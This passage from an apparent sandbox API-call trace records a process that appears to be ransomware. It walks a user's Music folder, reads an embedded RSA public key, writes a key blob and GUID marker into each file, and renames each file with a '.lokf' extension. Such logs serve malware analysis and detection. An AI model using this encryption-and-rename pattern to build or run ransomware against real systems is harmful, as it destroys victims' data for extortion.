HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75906a80, ftCreationTime.dwHighDateTime=0x1d4d3bf, ftLastAccessTime.dwLowDateTime=0xd19d26b0, ftLastAccessTime.dwHighDateTime=0x1d4ce5b, ftLastWriteTime.dwLowDateTime=0xd19d26b0, ftLastWriteTime.dwHighDateTime=0x1d4ce5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0060.431] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75906a80, ftCreationTime.dwHighDateTime=0x1d4d3bf, ftLastAccessTime.dwLowDateTime=0xd19d26b0, ftLastAccessTime.dwHighDateTime=0x1d4ce5b, ftLastWriteTime.dwLowDateTime=0xd19d26b0, ftLastWriteTime.dwHighDateTime=0x1d4ce5b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.431] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95d324b0, ftCreationTime.dwHighDateTime=0x1d4cdbe, ftLastAccessTime.dwLowDateTime=0x93053a70, ftLastAccessTime.dwHighDateTime=0x1d4d25a, ftLastWriteTime.dwLowDateTime=0x93053a70, ftLastWriteTime.dwHighDateTime=0x1d4d25a, nFileSizeHigh=0x0, nFileSizeLow=0x79e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iuj_U3uV2UvsBrXi.wav", cAlternateFileName="IUJ_U3~1.WAV")) returned 1 [0060.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.431] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.431] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\iuj_U3uV2UvsBrXi.wav") returned=".wav" [0060.431] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\iuj_U3uV2UvsBrXi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\iuj_u3uv2uvsbrxi.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.431] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=31208) returned 1 [0060.431] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.434] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x79c2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.434] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.435] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x79e8, lpOverlapped=0x0) returned 1 [0060.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.435] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.435] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.435] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0060.436] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.436] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.436] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.436] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.436] GetLastError () returned 0x0 [0060.436] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.436] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0060.436] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.436] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.436] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.436] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.436] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.437] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x79e8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.437] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.437] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.437] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.437] CloseHandle (hObject=0x5cc) returned 1 [0060.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.438] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290398 | out: hHeap=0x660000) returned 1 [0060.438] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\iuj_U3uV2UvsBrXi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\iuj_u3uv2uvsbrxi.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\iuj_U3uV2UvsBrXi.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\iuj_u3uv2uvsbrxi.wav.lokf")) returned 1 [0060.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.438] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.438] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3228c60 | out: hHeap=0x660000) returned 1 [0060.439] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee02fe0, ftCreationTime.dwHighDateTime=0x1d4cd2b, ftLastAccessTime.dwLowDateTime=0xc4e71ae0, ftLastAccessTime.dwHighDateTime=0x1d4c5cb, ftLastWriteTime.dwLowDateTime=0xc4e71ae0, ftLastWriteTime.dwHighDateTime=0x1d4c5cb, nFileSizeHigh=0x0, nFileSizeLow=0x179a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k9qaL9eZD8xHKw.m4a", cAlternateFileName="K9QAL9~1.M4A")) returned 1 [0060.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.439] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0060.439] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8698 | out: hHeap=0x660000) returned 1 [0060.439] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\k9qaL9eZD8xHKw.m4a") returned=".m4a" [0060.439] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\eIv9rDB\\-Y1PqBS8_MAyXOFE\\k9qaL9eZD8xHKw.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\eiv9rdb\\-y1pqbs8_mayxofe\\k9qal9ezd8xhkw.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.440] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=96681) returned 1 [0060.440] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.442] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x17983, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.442] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.443] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.443] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.443] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.443] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x179a9, lpOverlapped=0x0) returned 1 [0060.444] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.444] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.444] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.444] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.444] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8698) returned 1 [0060.445] CryptCreateHash (in: hProv=0x6b8698, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.445] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.445] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.445] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.445] GetLastError () returned 0x0 [0060.445] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.445] CryptReleaseContext (hProv=0x6b8698, dwFlags=0x0) returned 1 [0060.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.445] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.445] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.445] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.445] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.445] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x179b0) returned 0x9c8bae8 [0060.446] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c89370 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85dd0 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c893b8 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85de8 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e18 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e30 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.446] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e18 | out: hHeap=0x660000) returned 1 [0060.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e30 | out: hHeap=0x660000) returned 1 [0060.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85e30 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85e18 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e30 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85e18 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.447] GetCurrentThreadId () returned 0x9e0 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8ab50 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8698 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.447] GetCurrentThreadId () returned 0x9e0 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.447] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.447] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85e18 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.448] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.448] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 